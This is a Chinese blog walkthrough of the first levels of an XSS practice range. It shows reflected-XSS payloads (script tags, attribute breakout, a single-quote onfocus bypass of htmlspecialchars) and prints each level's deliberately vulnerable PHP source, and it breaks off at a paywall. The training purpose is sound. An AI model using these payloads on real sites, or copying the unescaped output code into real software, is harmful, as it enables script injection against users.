xss靶场练习(二)之xss小游戏

最新推荐文章于 2024-08-18 10:57:52 发布
原创 最新推荐文章于 2024-08-18 10:57:52 发布 · 3.0k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

前言

话说自从网络安全修正法推出,  不敢轻易动国内的网站,  平时就打打靶场,  本文记录练习之路。

xss小游戏在线地址:  http://test.ctf8.com/

xss小游戏一共二十关。

为了方便,  我把项目copy在本地。

为了方便实战效果和理解,  本文采用先通关再展示源码的排版方式。

 

 

Leve-1

有一个参数name:

再看看name在html源码中的位置:

可以看到位于h2标签中,  故可以直接注入xss攻击:

http://localhost/xss_games/level1.php
?name=<script>alert(1)</script>

点击确定自动location到下一关:

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 

 

Level-2

第二关随便输入一个搜索值:

观察在网页的生成位置:

发现输入的值在input标签中,  我们闭合input标签即可:

http://localhost/xss_games/level2.php
?keyword=hack"><script>alert(1)</script>

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 

 

Level-3

和上一题一样,  随意输入一个值来观察情况:

继续尝试闭合绕过:

http://localhost/xss_games/level3.php
?keyword=what"><script>alert(1)</script>
&submit=搜索

发现没有闭合出去,  可能是被转义或者编码过,  

既然出不去,  那可以在input标签里加属性来xss:

http://localhost/xss_games/level3.php
?keyword=what" onfocus=alert(1)
&submit=搜索

发现还是不对....value值的双引号都没闭合出去。

这里不得其解,  看了下答案,  原来是源码中用了 htmlspecialchars()函数:  过滤一些特殊字符

  • htmlspecialchars (string, quotestyle, character-set)

把一些预定义的字符转换为 HTML 实体。

预定义的字符是:

& (和号) 成为 &amp;

" (双引号) 成为 &quot;

' (单引号) 成为 &#039;  (默认是不包括单引号的,  要打开)

< (小于) 成为 &lt;

> (大于) 成为 &gt;

其中,  quotestyle参数如下:

quotestyle

可选。规定如何编码单引号和双引号。

  • ENT_COMPAT - 默认。仅编码双引号。
  • ENT_QUOTES - 编码双引号和单引号。
  • ENT_NOQUOTES - 不编码任何引号。

所以我们用双引号闭合时,  双引号会被转义成HTML实体。

由于htmlspecialchars()函数默认状态是只过滤双引号的,  "放过"了单引号, 所以可以用单引号来闭合他:

然后发现还多出一个单引号 (至于为什么,  源码部分会解释),  我们用 // 把它注释掉:

http://localhost/xss_games/level3.php
?keyword=hack' onfocus=alert(1)//
&submit=搜索

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level4.php?keyword=try harder!"; 
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

看关键部分:  

<input name=keyword  value='".htmlspecialchars($str)."'>

可以看到,  value的值被单引号闭合起来,  至于双引号,  是通过 . (php的字符串连接符)与处理过后的str连接的,  这样才得以在前端的网页中显示出如下效果:

所以实质上我们用单引号闭合就可以往input里加属性了 (类似sql注入), 最后尾部剩下的单引号记得注释掉。

 

 

Level-4

测试一下:

继续尝试绕过闭合:

最低0.47元/天 解锁文章
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 3772
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xss靶场练习
qq_46804551的博客
11-02 356
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
XSS漏洞简介、危害与分类及验证
2201_75362610的博客
04-14 3103
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 1143
一个在线的XSS练习靶场19关全带通关答案
XSS-labs-level2详解
m0_49025459的博客
05-23 323
当用户在文本框中输入搜索关键字并点击提交按钮时,表单将通过GET方法发送给名为“level2.php”的脚本页面。PHP代码检查URL参数中的“keyword”值,对其进行HTML转义,然后将其用于搜索结果消息中的输出。​由此可见我们的输入的恶意代码并没有被网页直接执行,所以我们需要将标签闭合,然后注释掉最后面的”>。我们正常输入然后在网页前端看一下我的输入是否存在问题。而其他标签法遵循这个原理也可以进行xss。就可以成功绕过,形成反射性xss了。
XSS练习小游戏和答案参考
dl71181的博客
12-19 377
源码:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 感谢源码作者提供了这样的环境。 我自己在本地虚拟机的路径,http://127.0.0.1/xss/ 打开后提示点击图片,进入第一关。 第一关:输入的变量直接被输出,直接构造paylo...
XSS靶场练习
zlloveyouforever的博客
04-30 993
XSS-labs靶场练习前十关 很详细的哦
XSS练习小游戏
weixin_30906671的博客
04-15 272
在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境 源码:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我选择使用本地环境搭建,这样好进行源码分析 level1 <?php ...
网络安全之xss靶场练习
bb_lo的博客
08-18 1471
靶场地址页面显示如下。
xss-labs靶场环境
最新发布
09-17
为了帮助安全研究人员、开发者及网络安全爱好者更好地理解和防御XSS攻击,诞生了专门的靶场环境,比如xss-labs靶场环境。这是一个用于模拟XSS攻击的平台,它允许用户在一个安全、可控的环境中进行各种XSS攻击实验,...
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.youkuaiyun.com/md?articleId=104496122 欢迎各位小伙伴下载
xss源码小游戏.rar
07-09
xss代码小游戏,你值得拥有,简单粗暴,带你学会xss,非常适合初学者.
XSS-11注入靶场闯关(小游戏)——第十一关
qq_39330735的博客
02-04 636
XSS-11注入靶场闯关(小游戏)——第十一关通关详解,请求头referer注入
XSS-labs靶场1-13关解法答案
紫洋的博客
03-05 1133
script>和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
xss小游戏
weixin_44110913的博客
03-01 804
<p></p><p>最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。</p> 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一关,没有任何疑问,简单的不能再简单,没有任何过滤 输入点...
XSS-GAME小游戏
weixin_43296565的博客
09-14 268
查看源代码,没有任何过滤,直接输入,弹框进入下一关。
自建靶场 XSS练习(一)
fanxiaoyao1的博客
03-01 1069
自建靶场 XSS练习(一) 点击链接快速跳到指定关卡 文章目录自建靶场 XSS练习(一)靶场搭建一、第一关、第关三、第三关四、第四关五、第五关六、第六关七、第七关七、第八关九、第九关 靶场搭建 我用的是phpStudy,靶场代码可以去github上找,或者私信问我要 浏览器用的火狐,有hackbar插件,谁用谁知道 一、第一关 点击进入第一关 这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩
XSS-9注入靶场闯关(小游戏)——第九关
qq_39330735的博客
02-04 762
XSS-9注入靶场闯关(小游戏)——第九关,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
XSS-14、15注入靶场闯关(小游戏)——第十四、五关
qq_39330735的博客
02-04 1353
XSS-15注入靶场闯关(小游戏)——第十五关,文件链接注入通关详解
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值